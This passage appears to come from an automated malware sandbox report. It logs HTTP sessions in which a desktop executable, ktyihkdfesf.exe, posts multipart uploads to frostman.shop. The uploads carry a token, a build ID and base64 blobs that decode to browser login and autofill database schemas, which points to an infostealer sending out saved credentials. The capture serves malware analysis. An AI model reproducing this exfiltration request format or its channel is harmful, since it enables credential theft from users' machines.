                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:27 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                30192.168.2.649813116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:28 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----X4ECT0ZMOZUAAA1VSRI5
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 55081
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:28 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 58 34 45 43 54 30 5a 4d 4f 5a 55 41 41 41 31 56 53 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 58 34 45 43 54 30 5a 4d 4f 5a 55 41 41 41 31 56 53 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 58 34 45 43 54 30 5a 4d 4f 5a 55 41 41 41 31 56 53 52 49 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------X4ECT0ZMOZUAAA1VSRI5Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------X4ECT0ZMOZUAAA1VSRI5Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------X4ECT0ZMOZUAAA1VSRI5Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:28 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:28 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:29 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                31192.168.2.649820116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----T2DB1DBIMOZU3EU3O890
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 142457
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------T2DB1DBIMOZU3EU3O890Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                                Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
